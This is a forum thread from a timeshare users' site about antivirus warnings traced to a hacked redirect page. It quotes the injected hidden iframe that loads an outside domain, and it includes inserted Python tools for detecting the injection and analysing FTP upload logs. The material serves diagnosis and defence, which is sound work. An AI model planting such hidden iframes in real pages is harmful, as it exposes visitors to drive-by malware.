# Anyone else getting Malware notices?



## Jim Bryan

Tried three times today getting on TUG and get a notice that my spyware has blocked a malware situation on TUG.


----------



## DeniseM

Someone else emailed me about this today, but I don't know if there is a problem or not.  I am on a Mac, so I don't get those kinds of notices.



> * MSIE Java Deployment Toolkit Input Invalidation *
> 
> Severity: High
> This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.
> 
> Description: This signature will detect an Insufficient Validation vulnerability in Java Deployment Toolkit ActiveX Control.
> 
> Additional Information: Java Deployment Toolkit Performs Insufficient Validation of Parameters



I am sure an Admin will look into this and let us know.


----------



## TUGBrian

Doug and I have gone over this in great detail...and there is simply nothing in vbulletin (or the forum) that even uses JAVA.

Wish I had a better theory for you, but the best we can come up with atm is that some virus software has downloaded a new scan definition package that picks up something as a false positive.


----------



## Makai Guy

The page that has been reported to me is the BBS main page at www.tugbbs.com.   Is this where you are seeing this?

That report refers to Java, which is not used by the BBS at all (JavaSCRIPT, which the bbs does use, is a different animal altogether). 

I suspect this is just a false positive, generated by a new set of virus definitions downloaded to the security program.


----------



## Numismatist

I reported it earlier, Symantec says it is a high threat alert.  I get it at work, but not here at home.


----------



## timeos2

*It's a local cleanup needed*



Numismatist said:


> I reported it earlier, Symantec says it is a high threat alert.  I get it at work, but not here at home.



It is a local PC issue, not a BBS issue. DO NOT load/accept any type of program it says you need to "clean it up", as it will be something even worse. Run a full cleanup of your hard drive - not with Norton, as they are notoriously compromised by any respectable virus/spyware - and pay special attention to the SmitFraud virus and its mates. You may need to remove the drive & scan it as a slave on a second PC. Also, before you clean up, make sure to turn off "System Restore", as the problem programs know about that and hide there to reappear at the next boot up.

If all of this is strange to you, you need a PC person to clean it up for you.


----------



## MollyBuzz

I'm getting it too, only when I visit tugbbs. I found this, don't know if it will help out any troubleshooting:
http://www.sitepoint.com/forums/showthread.php?t=691290

It deals with other vbulletin forums getting the same thing...


----------



## timeos2

MollyBuzz said:


> I'm getting it too, only when I visit tugbbs. I found this, don't know if it will help out any troubleshooting:
> http://www.sitepoint.com/forums/showthread.php?t=691290
> 
> It deals with other vbulletin forums getting the same thing...



The fact that only some machines "see" it means that the issue is local - your PC - being triggered by a common action from vBulletin software.  It is still a local problem to fix.


----------



## Makai Guy

Repeat from earlier in this thread:


Makai Guy said:


> The page that has been reported to me is the BBS main page at www.tugbbs.com.   *Is this where you are seeing this?*



We obviously can't investigate very well if we don't know what page triggers the warning.

Also, please update whichever program you use that is reporting the problem, see if you still get the warning, and report back.


----------



## Numismatist

I get it when I load tugbbs.com every time (having been on another site before that), so it's the first time going to tugbbs.  I have Norton 360 at work where it happens.  Here, at home, I have Norton Internet Security (a slightly different version) and it does NOT happen here.

Clearly, it's a combination of the virus program and something on TUG; I don't get the message on any other website I go to.

Hope this helps.


----------



## ace2000

*Slightly* off-topic, but this is a great site for checking out web site addresses for viruses...  just type in the address.

http://safeweb.norton.com/

Results for TUG...

http://safeweb.norton.com/report/show?url=www.tug2.net


----------



## Jim Bryan

I have Avast and I get a blocked Malware notice when I get on TUG and again when I get on TUG BBS, third day in a row. Just started.

Says it's

HTML:Iframe.inf


----------



## cotraveller

Windows 7, Internet Explorer 8, Norton from Comcast, Norton Security Suite, Version 4.2.0.12.  It says the latest definitions update occurred 2 minutes ago.  I'm not sure how often it does that.

I do not receive any adverse notices about TUG, either on the main site or the BBS.  I can't recall ever receiving one in the past either.


----------



## Makai Guy

ace2000 said:


> *Slightly* off-topic, but this is a great site for checking out web site addresses for viruses...  just type in the address.
> 
> http://safeweb.norton.com/
> 
> Results for TUG...
> 
> http://safeweb.norton.com/report/show?url=www.tug2.net



Thanks, that looks like a useful link.

Those are the results for the TUG home page at www.tug2.net.  When I visited the result page, it showed no threats.

While there, I ran the check for the bbs main page at www.tugbbs.com, and it also showed no threats.

Once again, I believe these were false positives that have been resolved as the utilities updated their signature files.


----------



## BellaWyn

Noticed this thread when it first went up.  I use Mozilla so I wasn't getting anything. Loaded the tugbbs.com up tonight in IE 8 and got the block warning for Malware through my Webroot.

Could this be an IE issue?


----------



## timeos2

BellaWyn said:


> Noticed this thread when it first went up.  I use Mozilla so I wasn't getting anything. Loaded the tugbbs.com up tonight in IE 8 and got the block warning for Malware through my Webroot.
> 
> Could this be an IE issue?



NEVER use IE - except for Windows updates I would take it off my PCs - so that hadn't occurred to me. Just tried it - no errors or warnings, and Trend Micro reports it as a "safe page" just as it does from Mozilla Firefox, which I use 99.9% of the time.  Good thought to check it.


----------



## Ken555

TUG tried redirecting to eiueuiuewi.com for me just now (Monday @ 9:45am Pacific). Several attempts to login resulted in the same redirect, and then it just worked. 

I'm using a Mac with Firefox (latest version). 

This has been reported elsewhere as a hack of the vBulletin server. See post #4 on this thread (this is a recent thread) for details:

http://www.sitepoint.com/forums/showthread.php?t=691290

Here's another:

http://www.experts-exchange.com/Virus_and_Spyware/Internet_Security/Q_26352292.html

The problem, as reported in these threads, is due to FTP access being compromised on the server. 

I hope you have a good backup of TUG.


----------



## TUGBrian

Ken555 said:


> TUG tried redirecting to eiueuiuewi.com for me just now (Monday @ 9:45am Pacific). Several attempts to login resulted in the same redirect, and then it just worked.
> 
> I'm using a Mac with Firefox (latest version).
> 
> This has been reported elsewhere as a hack of the vBulletin server. See post #4 on this thread (this is a recent thread) for details:
> 
> http://www.sitepoint.com/forums/showthread.php?t=691290
> 
> Here's another:
> 
> http://www.experts-exchange.com/Virus_and_Spyware/Internet_Security/Q_26352292.html
> 
> The problem, as reported in these threads, is due to FTP access being compromised on the server.
> 
> I hope you have a good backup of TUG.



I don't see anything close to this listed on the server (perhaps Doug can look in places I can't though).

I'd also think this would impact 100% of the users if it were truly compromised?


----------



## TUGBrian

TUGBrian said:


> I don't see anything close to this listed on the server (perhaps Doug can look in places I can't though).
> 
> I'd also think this would impact 100% of the users if it were truly compromised?





Also...when you report issues, it's very important to specify the page/URL you were trying to go to when experiencing the problem.

"TUG" consists of nearly half a dozen different servers and sites.

Thanks!


----------



## Ken555

TUGBrian said:


> Also...when you report issues, it's very important to specify the page/URL you were trying to go to when experiencing the problem.
> 
> "TUG" consists of nearly half a dozen different servers and sites.
> 
> Thanks!




Just tried logging back in and had the same problem. I was able to eventually login by going to tugbbs.com/forums/. I normally just go to www.tugbbs.com.

Here's the page source for the default HTML page on tugbbs.com showing that the site has apparently been hacked (why else would it go to this other site?).

```html
<head>
<meta http-equiv="refresh" content="0; url=http://tugbbs.com/forums/" />
</head><iframe src="http://eiueuiuewi.com/54N7JS34B34D5NH34J/" width="4" height="2"></iframe>
```

Domain reg info on this domain shows it's in China, and is a brand new domain. Not a good feeling about this one.


Domain name: eiueuiuewi.com

Registrant Contact:
   Whois Privacy Protection Service
   Whois Agent zywrlbhjdk@whoisservices.cn
   +86.05922577888 fax: +86.05922577111
   Xiamen Software Park shengshi Building
   xiamen fujian 361005
   cn

Administrative Contact:
   Whois Agent zywrlbhjdk@whoisservices.cn
   +86.05922577888 fax: +86.05922577111
   Xiamen Software Park shengshi Building
   xiamen fujian 361005
   cn

Technical Contact:
   Whois Agent zywrlbhjdk@whoisservices.cn
   +86.05922577888 fax: +86.05922577111
   Xiamen Software Park shengshi Building
   xiamen fujian 361005
   cn

Billing Contact:
   Whois Agent zywrlbhjdk@whoisservices.cn
   +86.05922577888 fax: +86.05922577111
   Xiamen Software Park shengshi Building
   xiamen fujian 361005
   cn

DNS:
ns1.google.com
ns2.google.com

Created: 2010-07-16
Expires: 2011-07-16
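
The snippet posted above is the classic shape of a drive-by injection: the legitimate `meta refresh` still fires, so the visitor lands on the real forum, while a 4x2 pixel iframe silently loads a third-party host first. The following scanner is an added example, not code from this thread, from vBulletin or from TUG; it uses only the standard library and flags exactly that pattern (a near-invisible iframe, or a meta refresh, pointing at a host outside a caller-supplied trusted list). The `TINY_PIXELS` threshold, the trusted-host list and the two sample pages at the bottom are assumptions constructed for the example; the infected sample mirrors the snippet in the post.

```python
"""Detect the injection pattern shown above: a near-invisible <iframe>
pointing at a third-party host, riding on a page that also carries a
<meta http-equiv="refresh"> so the visitor is bounced on before noticing.

Added example, not code from this thread, from vBulletin or from TUG.
Assumptions: the TINY_PIXELS threshold, the trusted-host list passed by
the caller, and the constructed sample pages at the bottom.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

TINY_PIXELS = 10  # assumption: width and height both <= this is "hidden"


class InjectionFinder(HTMLParser):
    """Collects (reason, url) findings while the parser walks the document."""

    def __init__(self, trusted_hosts):
        super().__init__()
        self.trusted = {h.lower() for h in trusted_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            self._check_iframe(a)
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self._check_refresh(a)

    def _untrusted(self, url):
        host = (urlparse(url).hostname or "").lower()
        return bool(host) and host not in self.trusted

    def _check_iframe(self, a):
        src = a.get("src", "")
        w, h = _pixels(a.get("width")), _pixels(a.get("height"))
        tiny = (w is not None and h is not None
                and w <= TINY_PIXELS and h <= TINY_PIXELS)
        if self._untrusted(src):
            self.findings.append(("tiny iframe to untrusted host" if tiny
                                  else "iframe to untrusted host", src))
        elif tiny:
            self.findings.append(("tiny iframe", src))

    def _check_refresh(self, a):
        # content looks like "0; url=http://..."; pull out the url= part
        url = ""
        for part in a.get("content", "").split(";"):
            part = part.strip()
            if part.lower().startswith("url="):
                url = part[4:].strip().strip("'\"")
        if self._untrusted(url):
            self.findings.append(("meta refresh to untrusted host", url))


def _pixels(value):
    """'4', '4px' or '2' -> int; None or non-numeric -> None."""
    if value is None:
        return None
    digits = "".join(ch for ch in value if ch.isdigit())
    return int(digits) if digits else None


def scan_html(html, trusted_hosts):
    """Return the list of (reason, url) findings for one HTML document."""
    finder = InjectionFinder(trusted_hosts)
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed samples: the redirect page as posted in the thread, with the
# injected iframe, and a clean version of the same redirect file.
INFECTED_PAGE = """<head>
<meta http-equiv="refresh" content="0; url=http://tugbbs.com/forums/" />
</head><iframe src="http://eiueuiuewi.com/54N7JS34B34D5NH34J/" width="4" height="2"></iframe>"""

CLEAN_PAGE = """<head>
<meta http-equiv="refresh" content="0; url=http://tugbbs.com/forums/" />
</head>"""

TRUSTED = ["tugbbs.com", "www.tugbbs.com"]  # assumption: the site's own hosts

if __name__ == "__main__":
    for name, page in (("infected", INFECTED_PAGE), ("clean", CLEAN_PAGE)):
        print(name, scan_html(page, TRUSTED))
```

Run it over every `index.html` and `index.htm` on the host (not only the one file a user happened to notice) and diff the result against the last clean backup; an iframe that is small, off-site and sitting outside `<body>` is worth a look even when the destination currently serves nothing but a blank image.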


----------



## TUGBrian

working on this now


----------



## TUGBrian

TUGBrian said:


> working on this now



try to access tugbbs.com now...see if the error has gone away.


----------



## Makai Guy

Ken555 said:


> Just tried logging back in and had the same problem. I was able to eventually login by going to tugbbs.com/forums/. I normally just go to www.tugbbs.com.
> 
> Here's the page source for the default HTML page on tugbbs.com showing that the site has apparently been hacked (why else would it go to this other site?).


Thanks, Ken, that was VERY helpful and helped to pin down the problem.  All of my shortcut links to the bbs go to the ../forums location, so the potential problem with the file that redirects from tugbbs.com to tugbbs.com/forums never occurred to me.


----------



## Ken555

TUGBrian said:


> try to access tugbbs.com now...see if the error has gone away.



Nope, it's still there as of 11:27am Pacific. Be sure you change your FTP passwords, since that was what the reported issue was elsewhere (strong passwords, etc).


----------



## TUGBrian

Ken555 said:


> Nope, it's still there as of 11:27am Pacific. Be sure you change your FTP passwords, since that was what the reported issue was elsewhere (strong passwords, etc).



all passwords have been changed, and all files have been restored.

Files were replaced at 2:03pm Eastern time...I've just confirmed the files do not contain the code at the bottom....refresh please?


----------



## Ken555

Makai Guy said:


> Thanks, Ken, that was VERY helpful and helped to pin down the problem.  All of my shortcut links to the bbs go the the ../forums location so the potential problem with the file that redirects from tugbbs.com to tugbbs.com/forums never occurred to me.



Glad to be of help. Many of these automated/semi-manual hacks focus on the top level of a site (this is a fairly amateurish hack from what I can see, though you should do a full security audit to verify and keep a secure backup offline).  Adding an iframe to an existing file proves they were able to compromise your security, so chances are someone who has admin privileges has a weak password.


----------



## Ken555

TUGBrian said:


> all passwords have been changed, and all files have been restored.
> 
> files were replaced at 2:03pm eastern time...ive just confirmed the files do not contain the code at the bottom....refresh please?



Yes, it's working (tried with another browser). Thanks.


----------



## Numismatist

Anyone know if this did anything to our computers (as users)?


----------



## Ken555

Numismatist said:


> Anyone know if this did anything to our computers (as users)?



It didn't affect my Mac, but if you're on Windows I'd suggest doing a full scan (can't hurt).


----------



## TUGBrian

Ken555 said:


> Glad to be of help. Many of these automated/semi-manual hacks focus on the top level of a site (this is a fairly amateurish hack from what I can see, though you should do a full security audit to verify and keep a secure backup offline).  Adding an iframe to an existing file proves they were able to compromise your security, so chances are someone who has admin privileges has a weak password.



oddly enough, they modified the index.html file of all the sites hosted on that server...and all of them use different usernames and passwords.

all admin passwords were changed as well...just to be on the safe side.


----------



## Ken555

TUGBrian said:


> oddly enough, they modified the index.html file of all the sites hosted on that server...and all of them use different usernames and passwords.
> 
> all admin passwords were changed as well...just to be on the safe side.



Then you should file a tech complaint with the host provider (assuming you host it), since someone's password (who may have root access) was compromised. If it wasn't one of your passwords, then you haven't fixed the problem.


----------



## TUGBrian

TUGBrian said:


> oddly enough, they modified the index.html file of all the sites hosted on that server...and all of them use different usernames and passwords.
> 
> all admin passwords were changed as well...just to be on the safe side.



I clicked the link in the code...and it didn't do anything that my computer picked up.

I've no idea what that site is in the first place...nor what the link does.

perhaps it merely flags a site that has been successfully compromised?


----------



## Ken555

TUGBrian said:


> I clicked the link in the code...and it didn't do anything that my computer picked up.
> 
> I've no idea what that site is in the first place...nor what the link does.
> 
> perhaps it merely flags a site that has been successfully compromised?



Could be. It only opened a small square image, so this could be the preliminary step toward a full attack... hmm, that's a pleasant thought.


----------



## TUGBrian

Ken555 said:


> Then you should file a tech complaint with the host provider (assuming you host it), since someone's password (who may have root access) was compromised. If it wasn't one of your passwords, then you haven't fixed the problem.



Every password that had any sort of access to the server was changed.

There are only two people that I'm aware of that even know what these passwords were in the first place.

Granted, some of them had been the same ones for many...many years.

Either way, the tech was able to identify the IP that uploaded the files...as well as the usernames used to upload them.  The IP was blocked...and files restored...and all passwords changed (including the root password).
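
The hosting tech's step above (pull the uploading IP and the accounts it used out of the FTP logs) is the part of this incident a site owner can reproduce themselves. The script below is an added example, not the thread's or the hosting company's tooling; it parses the standard xferlog format written by wu-ftpd, proftpd and vsftpd, lists every upload of an `index.html`/`index.htm`, and then singles out remote hosts that pushed index files into several sites' directories under different accounts, which is exactly the pattern described earlier in the thread (all sites on the server modified, each with its own FTP login). The log lines are constructed for the example: 203.0.113.45 and 198.51.100.7 are RFC 5737 documentation addresses, and the account names and docroot paths are assumptions, not TUG's real ones.

```python
"""Find who uploaded the modified index files from an FTP transfer log
(xferlog format, as written by wu-ftpd, proftpd and vsftpd).

Added example, not the thread's or the hosting company's tooling. The log
lines below are constructed: 203.0.113.45 and 198.51.100.7 are RFC 5737
documentation addresses, and the account names and docroot paths are
assumptions, not TUG's real ones.
"""
import re
from collections import defaultdict
from datetime import datetime

# Field order per xferlog(5):
#   current-time transfer-time remote-host file-size filename transfer-type
#   special-action-flag direction access-mode username service-name
#   authentication-method authenticated-user-id completion-status
# direction: i = upload to server, o = download, d = delete
XFERLOG_RE = re.compile(
    r"^(?P<when>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) "
    r"(?P<secs>\d+) (?P<host>\S+) (?P<size>\d+) (?P<file>\S+) "
    r"(?P<type>[ab]) (?P<action>\S) (?P<direction>[iod]) (?P<mode>[arg]) "
    r"(?P<user>\S+) (?P<service>\S+) (?P<auth>[01]) (?P<authid>\S+) "
    r"(?P<status>[ci])$"
)


def parse_xferlog(lines):
    """Parse lines into dicts; lines that do not match are skipped, not fatal."""
    records = []
    for line in lines:
        m = XFERLOG_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["when"] = datetime.strptime(" ".join(rec["when"].split()),
                                        "%a %b %d %H:%M:%S %Y")
        records.append(rec)
    return records


def uploads_matching(records, pattern=r"/index\.html?$"):
    """(remote-host, username) -> files uploaded whose path matches pattern."""
    pat = re.compile(pattern)
    out = defaultdict(list)
    for r in records:
        if r["direction"] == "i" and pat.search(r["file"]):
            out[(r["host"], r["user"])].append(r["file"])
    return dict(out)


def multi_site_uploaders(records, min_sites=2):
    """Remote hosts that pushed index files into >= min_sites distinct
    directories, under any account: one source, several vhosts, different
    FTP users, which is the shape of the incident in this thread."""
    dirs_by_host = defaultdict(set)
    for (host, _user), files in uploads_matching(records).items():
        for f in files:
            dirs_by_host[host].add(f.rsplit("/", 1)[0])
    return {h: sorted(d) for h, d in dirs_by_host.items() if len(d) >= min_sites}


def first_seen(records, host):
    """Earliest timestamp for a remote host: the start of the containment window."""
    times = [r["when"] for r in records if r["host"] == host]
    return min(times) if times else None


# Constructed sample log: one normal upload, three index-file uploads from a
# single remote address using three different accounts, one download, and a
# junk line that the parser must ignore.
SAMPLE_XFERLOG = """\
Mon Jul 19 09:12:44 2010 2 198.51.100.7 48213 /var/www/tugbbs/images/logo.png b _ i r tugftp ftp 0 * c
Mon Jul 19 11:41:03 2010 1 203.0.113.45 318 /var/www/tugbbs/index.html a _ i r tugftp ftp 0 * c
Mon Jul 19 11:41:05 2010 1 203.0.113.45 302 /var/www/tug2/index.html a _ i r tug2ftp ftp 0 * c
Mon Jul 19 11:41:06 2010 1 203.0.113.45 297 /var/www/site3/index.htm a _ i r site3ftp ftp 0 * c
Mon Jul 19 12:05:19 2010 1 198.51.100.7 318 /var/www/tugbbs/index.html a _ o r tugftp ftp 0 * c
this line is garbage and must be skipped
"""

if __name__ == "__main__":
    recs = parse_xferlog(SAMPLE_XFERLOG.splitlines())
    for host, dirs in multi_site_uploaders(recs).items():
        print(host, "first seen", first_seen(recs, host), "touched", dirs)
    for (host, user), files in uploads_matching(recs).items():
        print(host, user, files)
```

Two things the output tells you that the thread had to guess at: whether one set of credentials was enough (several accounts from the same address within seconds points at credentials harvested together, for instance from a client machine or a shared password file, rather than one weak password), and when the window opened, which is the earliest time you need a backup from before.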


----------



## Ken555

TUGBrian said:


> Either way, the tech was able to identify the IP that uploaded the files...as well as the usernames used to upload them.  the IP was blocked...and files restored...and all passwords changed (including the root password).



Excellent. Thanks for quickly addressing this, Brian.


----------



## TUGBrian

Ken555 said:


> Excellent. Thanks for quickly addressing this, Brian.



also note that should anything catastrophic happen, we do back up all tug servers remotely each night.


----------



## taffy19

Numismatist said:


> Anyone know if this did anything to our computers (as users)?



I am also questioning if it hurts the PC, as I noticed the re-direct to that strange website this morning on the Dell as well as the Mac.  The PC is acting very slow, and Dell will call me back again in two hours because I had to leave.  Do I need to do a full virus scan with Panda IS? That takes so long.  I have Malwarebytes too, that Dell installed after the Facebook virus.

Do we need to change our password too here and at home even if they are different?


----------



## TUGBrian

I can't find anything on the site at all, nor do any of my malware/virus scanners pick anything up on the PC that I visited the site on either.

I'd certainly schedule a full scan to be on the safe side, however.


----------



## Jim Bryan

TUGBrian said:


> Also...when you report issues, it's very important to specify the page/URL you were trying to go to when experiencing the problem.
> 
> "TUG" consists of nearly half a dozen different servers and sites.
> 
> Thanks!



I posted this earlier

I have Avast and I get a blocked Malware notice when I get on TUG and again when I get on TUG BBS, third day in a row. Just started.

Says it's

HTML:Iframe.inf


----------



## Jim Bryan

Must be fixed, I didn't get a warning when I just got on. Thank you!


----------

